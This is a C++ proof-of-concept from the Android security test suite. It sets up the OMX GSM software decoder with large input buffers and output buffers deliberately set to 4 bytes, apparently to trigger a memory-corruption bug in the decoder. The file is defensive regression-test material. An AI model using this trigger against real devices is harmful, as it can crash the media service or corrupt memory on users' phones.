/**
 * Copyright (C) 2020 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include "../includes/common.h"
#include <algorithm>
#include <stdlib.h>
#include <vector>

// This PoC is only for 32-bit builds
#if _32_BIT
#include "../includes/omxUtils.h"
#include "hidlmemory/mapping.h"
#include <fstream>

// Number of bytes read from the input file into the staging buffer.
// Parenthesized so the macro expands correctly inside larger expressions.
#define FILE_SIZE (UINT16_MAX + 1)
// Input port buffer size requested from the component, and the size of each
// file slice copied into an input buffer.
#define INPUT_BUFFER_SIZE 16380
// Buffer count requested for both the input and the output port.
#define NUMBER_OF_BUFFERS 4
// Output port buffer size requested from the component and allocated.
#define VULNERABLE_SIZE 4
// Poll interval while waiting for the EmptyBufferDone callbacks.
#define SLEEP_TIME_IN_SECONDS 1
// Upper bound on the time spent waiting for all input buffers to return.
#define EMPTY_BUFFER_DONE_CALLBACK_TIMEOUT_IN_SEC 30

// Count of EmptyBufferDone callbacks received so far. It is defined outside
// this file (presumably in the omxUtils helpers; confirm) and main() polls it.
extern int numCallbackEmptyBufferDone;
// Handle to the HIDL "ashmem" allocator service, obtained during static
// initialization and used by allocateHidlPortBuffers().
// NOTE(review): getService() may return null; this declaration does not check.
sp<IAllocator> mAllocator(IAllocator::getService("ashmem"));

/*
 * Allocates one ashmem-backed HIDL memory region of BufferSize bytes for each
 * buffer the component reports for portIndex (def.nBufferCountActual) and
 * appends them to *buffers. Any previous contents of *buffers are cleared.
 *
 * portIndex  - OMX port whose definition supplies the buffer count.
 * buffers    - output vector; cleared first.
 * BufferSize - size in bytes requested for every allocation.
 *
 * Returns OK. Failures are not returned; they are passed to omxExitOnError.
 * This covers a missing allocator, a failed parameter query, a HIDL transport
 * error, and an unsuccessful allocation. Buffers are only allocated here, not
 * registered with the component.
 */
int allocateHidlPortBuffers(OMX_U32 portIndex, Vector<Buffer> *buffers,
                            int BufferSize) {
  buffers->clear();
  // Avoid a null dereference if the "ashmem" service lookup failed.
  omxExitOnError(mAllocator.get() == nullptr);
  OMX_PARAM_PORTDEFINITIONTYPE def;
  // Zeroed (as main() does for its own parameter struct) so no indeterminate
  // fields are handed to the component.
  memset(&def, 0, sizeof(def));
  int err = omxUtilsGetParameter(portIndex, &def);
  omxExitOnError(err);
  for (OMX_U32 i = 0; i < def.nBufferCountActual; ++i) {
    Buffer buffer;
    buffer.mFlags = 0;
    // main() copies mID before omxUtilsUseBuffer assigns the real id, so
    // give it a defined placeholder value.
    buffer.mID = 0;
    // Defaults to failure in case the allocate callback is never invoked.
    bool success = false;
    auto transStatus = mAllocator->allocate(
        BufferSize, [&success, &buffer](bool s, hidl_memory const &m) {
          success = s;
          buffer.mHidlMemory = m;
        });
    omxExitOnError(!transStatus.isOk());
    omxExitOnError(!success);
    buffers->push(buffer);
  }
  return OK;
}
#endif /* _32_BIT */

/*
 * PoC entry point. Reads up to FILE_SIZE bytes from argv[1] and configures
 * the OMX GSM software decoder. Input buffers of INPUT_BUFFER_SIZE are
 * requested and filled with slices of the file; output buffers of only
 * VULNERABLE_SIZE bytes are requested. All buffers are queued, the component
 * is sent back to Idle, and main then waits for every input buffer to be
 * reported done.
 *
 * Returns EXIT_FAILURE on a wrong argument count, an unopenable input file,
 * or when not all EmptyBufferDone callbacks arrive within
 * EMPTY_BUFFER_DONE_CALLBACK_TIMEOUT_IN_SEC seconds. Otherwise returns
 * EXIT_SUCCESS, which is also the unconditional result on non-32-bit builds
 * where the PoC body is compiled out.
 */
int main(int argc, char *argv[]) {
  (void)argc;
  (void)argv;

// This PoC is only for 32-bit builds
#if _32_BIT
  if (argc != 2) {
    return EXIT_FAILURE;
  }
  std::ifstream file(argv[1], std::ifstream::binary);
  if (!file.is_open()) {
    return EXIT_FAILURE;
  }
  // Value-initialized (zeroed) so a file shorter than FILE_SIZE never leaves
  // indeterminate bytes that would later be copied into input buffers.
  std::vector<uint8_t> buffer(FILE_SIZE);
  file.read(reinterpret_cast<char *>(buffer.data()),
            static_cast<std::streamsize>(buffer.size()));
  file.close();

  /* Initialize OMX for the specified codec                                 */
  status_t ret = omxUtilsInit((char *)"OMX.google.gsm.decoder");
  omxExitOnError(ret);

  OMX_PARAM_PORTDEFINITIONTYPE params;

  /* Set OMX input port parameters                                          */
  // Start from the component's current definition, exactly as the output
  // port does below, so every field we do not override holds a valid value.
  memset(&params, 0, sizeof(params));
  omxUtilsGetParameter(OMX_UTILS_IP_PORT, &params);
  params.nPortIndex = OMX_UTILS_IP_PORT;
  params.nBufferSize = INPUT_BUFFER_SIZE;
  params.nBufferCountActual = params.nBufferCountMin = NUMBER_OF_BUFFERS;
  omxUtilsSetParameter(OMX_UTILS_IP_PORT, &params);
  // Read back what the component actually accepted.
  memset(&params, 0, sizeof(params));
  omxUtilsGetParameter(OMX_UTILS_IP_PORT, &params);

  /* Prepare input port buffers                                             */
  // Use the accepted per-buffer size directly. Computing
  // (count * size) / count could overflow or divide by zero.
  int inBufferCnt = params.nBufferCountActual;
  int inBufferSize = params.nBufferSize;
  std::vector<IOMX::buffer_id> inBufferId(inBufferCnt);

  /* Set OMX output port parameters                                          */
  omxUtilsGetParameter(OMX_UTILS_OP_PORT, &params);
  params.nPortIndex = OMX_UTILS_OP_PORT;
  params.nBufferSize = VULNERABLE_SIZE;
  params.nBufferCountActual = params.nBufferCountMin = NUMBER_OF_BUFFERS;
  omxUtilsSetParameter(OMX_UTILS_OP_PORT, &params);
  memset(&params, 0, sizeof(params));
  omxUtilsGetParameter(OMX_UTILS_OP_PORT, &params);

  /* Prepare output port buffers                                            */
  int outBufferCnt = params.nBufferCountActual;
  // Output buffers are intentionally tiny (VULNERABLE_SIZE bytes).
  int outBufferSize = VULNERABLE_SIZE;
  std::vector<IOMX::buffer_id> outBufferId(outBufferCnt);

  Vector<Buffer> inputBuffers;
  Vector<Buffer> outputBuffers;
  /* Register input buffers with OMX component                              */
  allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &inputBuffers, inBufferSize);
  for (int i = 0; i < inBufferCnt; ++i) {
    inBufferId[i] = inputBuffers[i].mID;
    sp<android::hidl::memory::V1_0::IMemory> mem =
        mapMemory(inputBuffers[i].mHidlMemory);
    omxExitOnError(mem.get() == nullptr);
    // Copy this buffer's INPUT_BUFFER_SIZE-byte slice of the file. The copy
    // is clamped to both the end of the file buffer and the size actually
    // allocated for the shared memory.
    size_t offset = static_cast<size_t>(INPUT_BUFFER_SIZE) * i;
    if (offset < buffer.size()) {
      size_t copySize = std::min(buffer.size() - offset,
                                 static_cast<size_t>(INPUT_BUFFER_SIZE));
      copySize = std::min(copySize, static_cast<size_t>(inBufferSize));
      memcpy((void *)mem->getPointer(), buffer.data() + offset, copySize);
    }
    omxUtilsUseBuffer(OMX_UTILS_IP_PORT, inputBuffers[i].mHidlMemory,
                      &inBufferId[i]);
  }

  /* Register output buffers with OMX component                             */
  allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &outputBuffers, outBufferSize);
  for (int i = 0; i < outBufferCnt; ++i) {
    outBufferId[i] = outputBuffers[i].mID;
    omxUtilsUseBuffer(OMX_UTILS_OP_PORT, outputBuffers[i].mHidlMemory,
                      &outBufferId[i]);
  }

  /* Do OMX State change to Idle                                            */
  omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
  /* Do OMX State change to Executing                                       */
  omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
  for (int i = 0; i < inBufferCnt; ++i) {
    OMXBuffer omxBuf(0, inBufferSize);
    omxUtilsEmptyBuffer(inBufferId[i], omxBuf, 0, 0, -1);
  }
  for (int i = 0; i < outBufferCnt; ++i) {
    OMXBuffer omxBuf(0, outBufferSize);
    omxUtilsFillBuffer(outBufferId[i], omxBuf, -1);
  }
  /* Do OMX State change to Idle                                            */
  omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);

  // Poll until every input buffer has been reported back. The counter is
  // external to this file (presumably bumped by the EmptyBufferDone
  // callback; confirm).
  time_t currentTime = time(nullptr);
  time_t endTime = currentTime + EMPTY_BUFFER_DONE_CALLBACK_TIMEOUT_IN_SEC;
  while (currentTime < endTime) {
    sleep(SLEEP_TIME_IN_SECONDS);
    if (numCallbackEmptyBufferDone == inBufferCnt) {
      break;
    }
    currentTime = time(nullptr);
  }
  if (numCallbackEmptyBufferDone != inBufferCnt) {
    // The staging buffer and id arrays are released automatically.
    return EXIT_FAILURE;
  }
  /* Free input and output buffers                                          */
  for (int i = 0; i < inBufferCnt; ++i) {
    omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, inBufferId[i]);
  }
  for (int i = 0; i < outBufferCnt; ++i) {
    omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, outBufferId[i]);
  }

  /* Free OMX resources                                                     */
  omxUtilsFreeNode();
#endif /* _32_BIT */

  return EXIT_SUCCESS;
}
